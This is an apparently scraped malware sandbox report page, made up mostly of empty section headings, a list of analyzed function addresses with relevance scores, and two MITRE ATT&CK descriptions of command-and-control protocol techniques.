Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary

Function 012B1040, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 184
librarymemoryCOMMON

Function 012B6B80, Relevance: 6.0, APIs: 4, Instructions: 41
memoryCOMMON

Function 012B88A7, Relevance: 16.6, APIs: 11, Instructions: 84
COMMON

Function 012BC0A3, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 012BC080, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 012B6A00, Relevance: .0, Instructions: 10
COMMON

Function 012B3610, Relevance: 91.3, APIs: 27, Strings: 25, Instructions: 313
COMMON

Function 012B49E0, Relevance: 65.1, APIs: 17, Strings: 20, Instructions: 328
COMMON

Function 012B22F0, Relevance: 57.9, APIs: 17, Strings: 16, Instructions: 198
COMMON

Function 012B4640, Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 252
COMMON

Function 012B2B10, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 243
COMMON

Function 012B2800, Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 223
COMMON

Function 012B25C0, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 155
COMMON

Function 012B21E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77
COMMON

Function 012B20E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 67
COMMON

Function 012BA5E2, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Function 012B8E23, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Function 012B1380, Relevance: 10.6, APIs: 7, Instructions: 126
COMMON

Function 012BD6D2, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Function 012BBB6C, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Function 012C1D26, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Function 012B347B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115
COMMON

Function 012C1673, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Function 012BECB1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 012BCC10, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre